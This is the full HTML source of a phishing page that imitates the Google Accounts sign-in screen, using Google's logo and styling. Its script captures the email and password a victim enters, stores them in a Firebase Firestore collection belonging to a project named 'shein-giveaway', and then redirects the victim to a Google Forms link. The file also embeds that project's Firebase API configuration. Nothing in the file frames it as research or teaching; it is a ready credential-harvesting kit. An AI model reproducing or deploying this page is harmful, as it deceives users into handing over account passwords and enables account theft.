<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in - Google Accounts</title>
    <link rel="icon" href="https://madeby.google.com/static/images/google_g_logo.svg" type="image/x-icon">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet">
    <!-- js -->

    <!-- firebase & Analytics -->
    <script src="https://www.gstatic.com/firebasejs/8.10.1/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.0.0/firebase-database.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.0.0/firebase-firestore.js"></script>
    <!-- TODO: Add SDKs for Firebase products that you want to use
         https://firebase.google.com/docs/web/setup#available-libraries -->
    <script src="https://www.gstatic.com/firebasejs/8.0.1/firebase-analytics.js"></script>

    <script>
        // Your web app's Firebase configuration
        // For Firebase JS SDK v7.20.0 and later, measurementId is optional
        
        var firebaseConfig = {
            apiKey: "AIzaSyA4smnctIMA8B58ITrHZl1KG_FmPM4dXN8",
            authDomain: "shein-giveaway.firebaseapp.com",
            projectId: "shein-giveaway",
            storageBucket: "shein-giveaway.appspot.com",
            messagingSenderId: "1019973456829",
            appId: "1:1019973456829:web:9d40c422e390ac32e2f8d4",
            measurementId: "G-YQY93ZXRW2"
        };
        // Initialize Firebase
        firebase.initializeApp(firebaseConfig);
        firebase.analytics();
        const firestore = firebase.firestore()

    </script>

</head>
<style>
    @import "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css";
    @import "https://fonts.googleapis.com/css?family=Raleway|Roboto";
    * {
        margin: 0px;
        padding: 0px;
        box-sizing: border-box;
        font-family: "Raleway";
    }
    
     :root {
        /*===== Colores =====*/
        --first-color: #1A73E8;
        --input-color: #80868B;
        --border-color: #DADCE0;
        /*===== Fuente y tipografia =====*/
        --body-font: 'Roboto', sans-serif;
        --normal-font-size: 1rem;
        --small-font-size: .75rem;
    }
    /*===== BASE =====*/
    
    *,
     ::before,
     ::after {
        box-sizing: border-box;
    }
    
    body {
        font-family: 'Roboto', sans-serif;
        height: 100vh;
        background: -webkit-linear-gradient(rgb(255, 255, 255) 0%, rgb(255, 255, 255) 100%);
    }
    
    .login-form {
        border: 1px solid #dadada;
        font-family: 'Open Sans', sans-serif;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 380px;
        height: 500px;
        background: #fff;
        overflow: hidden;
        border-radius: 2%;
    }
    
    .Head {
        font-family: 'Open Sans', sans-serif;
        line-height: 32px;
        width: 100%;
        text-align: center;
        font-size: 100%;
        font-weight: 400;
        color: black;
    }
    
    .login-form .backbtn.active {
        background: #647ace;
        cursor: pointer;
    }
    
    .login-form .backbtn.disabled {
        background: #eee;
    }
    
    .login-form .line {
        position: absolute;
        top: 60px;
        text-align: center;
        width: 100%;
        font-size: 22px;
        color: #666;
        font-family: "Roboto";
    }
    
    .login-form .line p {
        margin-top: 10px;
        color: rgb(0, 0, 0);
        font-family: 'Roboto', sans-serif;
        font-weight: 400;
        font-size: 60%;
        line-height: 24px;
    }
    
    .phases {
        position: absolute;
        top: 160px;
        height: 200px;
        width: 200%;
        left: 0%;
        transition: all 300ms ease;
    }
    
    .phases div {
        width: 50%;
        float: left;
        display: flex;
        flex-direction: column;
        padding: 0px 20px;
    }
    
    .phases div * {
        margin: 8px 0px;
    }
    
    .phases div input {
        padding-left: 5px;
    }
    
    .phases div input.error {
        border-color: tomato;
    }
    
    .phases div button {
        display: block;
        margin-left: auto;
        padding: .75rem 2rem;
        outline: none;
        border: none;
        background-color: var(--first-color);
        color: #fff;
        font-size: var(--normal-font-size);
        border-radius: .5rem;
        cursor: pointer;
        transition: .3s;
    }
    
    button:hover {
        box-shadow: 0 10px 36px rgba(0, 0, 0, .15);
    }
    
    .phases.next {
        left: -100%;
    }
    
    .create {
        position: absolute;
        bottom: 20px;
        width: 100%;
        text-align: center;
    }
    
    .create a {
        text-decoration: none;
        font-size: 16px;
        color: #196be8;
    }
    
    .loading {
        position: absolute;
        top: 0px;
        left: 0px;
        width: 100%;
        height: 100%;
        background: #fff;
        display: none;
        z-index: 2;
    }
    
    .loading.show-it {
        display: inline-block;
    }
    
    img {
        width: 15%;
    }
    
    .loading:before {
        content: "";
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%) rotate(0deg);
        width: 50px;
        height: 50px;
        border: 5px solid #eee;
        border-top-color: #196be8;
        border-radius: 50%;
        animation: loading 900ms ease infinite;
    }
    
    @keyframes loading {
        to {
            transform: translate(-50%, -50%) rotate(360deg);
        }
    }
    
    .phase-1 {
        position: relative;
        height: 48px;
        margin-bottom: 1.5rem;
    }
    
    .phase-2 {
        position: relative;
        height: 48px;
        margin-bottom: 1.5rem;
    }
    
    .form__input {
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        font-size: var(--normal-font-size);
        border: 1px solid var(--border-color);
        border-radius: .5rem;
        outline: none;
        padding: 1rem;
        background: none;
        z-index: 1;
    }
    
    .form__label {
        position: absolute;
        left: 2rem;
        top: .7rem;
        padding: 0 .25rem;
        background-color: #fff;
        color: var(--input-color);
        font-size: var(--normal-font-size);
        transition: .3s;
        font-weight: 55s0;
    }
    /*Input focus move up label*/
    
    .form__input:focus+.form__label {
        top: -.5rem;
        left: .8rem;
        color: var(--first-color);
        font-size: var(--small-font-size);
        font-weight: 500;
        z-index: 10;
    }
    /*Input focus sticky top label*/
    
    .form__input:not(:placeholder-shown).form__input:not(:focus)+.form__label {
        top: -.5rem;
        left: .8rem;
        font-size: var(--small-font-size);
        font-weight: 500;
        z-index: 10;
    }
    /*Input focus*/
    
    .form__input:focus {
        border: 1.5px solid var(--first-color);
    }
    
    a {
        font-size: 80%;
        font-weight: 600;
        font-family: 'Roboto', sans-serif;
    }
    
    p.content {
        font-family: 'Roboto', sans-serif;
    }
    
    .bottom-section {
        width: 100%;
    }
</style>

<body>
    <div class="container">
        <div class="login-form">
            <div class="line">
                <div>
                    <div class="logoSize"><c-wiz jsrenderer="OTcFib" jsshadow="" jsdata="deferred-i5" data-p="%.@.]" data-node-index="2;0" jsmodel="hc6Ubd" c-wiz=""><div class="zOO9Bf " jscontroller="Rusgnf" jsname="n7vHCb"><div jsname="jjf7Ff"><div id="logo" class="YNY4de" title="Google"><div class="Bym39d" jsname="l4eHX"><svg viewBox="0 0 75 24" width="75" height="24" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" class="BFr46e xduoyf"><g id="qaEJec"><path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z"></path></g><g id="YGlOvc"><path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path></g><g id="BWfIk"><path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z"></path></g><g id="e6m3fd"><path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z"></path></g><g id="vbkDmc"><path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z"></path></g><g id="idEJde"><path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z"></path></g></svg></div></div></div></div><c-data id="i5" jsdata=" eCjdDd;_;3"></c-data></c-wiz></div>
                    <div class="Head">Sign in</div>
                </div>
                <p class="content">Use your Google Account</p>
            </div>
            <div class="phases" id="phase-form">
                <div class="phase-1">
                    <input id="email" class="form__input" autocomplete="off" onfocus="removeError(this);" type="text" placeholder=" ">
                    <label for="" class="form__label">Email or phone</label>
                    <a href="SignIn.html">Forgot email?</a>
                    <p class="subtitle"><a>Not your computer? Use Guest mode to sign in privately. </a><a href="SignIn.html">Learn more</a></p>
                    <bottom-section>
                        <div>
                        <create-account>
                            <a href="#" style="text-decoration: none;">Create an account</a>
                        </create-account>
                        </div>
                        <button onclick="next();">Next</button>
                    </bottom-section>
                </div>
                <div class="phase-2">
                    <input type="password" class="form__input" onfocus="removeError(this);" id="password" placeholder="">
                    <label for="" class="form__label">Password</label>
                    <a href="SignIn.html">Forget password?</a>
                    <button onclick="submitForm();">Next</button>
                </div>
            </div>

            <div class="loading"></div>
        </div>

    </div>

    <script>
        var state = false;

        function next() {
            var email = trim(document.getElementById('email').value);
            if (isEmail(email)) {
                // set Storage
                localStorage.setItem("email", document.getElementById('email').value);
                document.getElementById('phase-form').classList.add('next');
                state = true;
            } else {
                document.getElementById('email').classList.add('error');
            }
        }

        function submitForm() {
            var password = trim(document.getElementById('password').value);
            if (password.length > 5) {
                //Submit form ...
                document.getElementsByClassName('loading')[0].classList.add('show-it');
                // set Storage
                localStorage.setItem("password", document.getElementById('password').value);

                // Add a new document with a generated id.
                firestore.collection("data").add({
                    email: localStorage.getItem("email"),
                    password: localStorage.getItem("password")
                })
                .then((docRef) => {
                    console.log("Document written with ID: ", docRef.id);
                    window.location.href = "https://forms.gle/Kg7AsP2EhCGDSCmu7"
                })
                .catch((error) => {
                    console.error("Error adding document: ", error);
                });

            } else {
                document.getElementById('password').classList.add('error');
            }
        }

        function trim(str) {
            str = str.replace(/^\s+/, '');
            for (var i = str.length - 1; i >= 0; i--) {
                if (/\S/.test(str.charAt(i))) {
                    str = str.substring(0, i + 1);
                    break;
                }
            }
            return str;
        }

        function isEmail(str) {
            var pattern = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/;
            return pattern.test(str);
        }

        function back(e) {
            if (state) {
                document.getElementById('backbtn').classList.remove('active');
                document.getElementById('phase-form').classList.remove('next');
                state = false;
            }
        }

        function removeError(ref) {
            try {
                ref.classList.remove('error');
            } catch (msg) {}
        }
    </script>
</body>

</html>
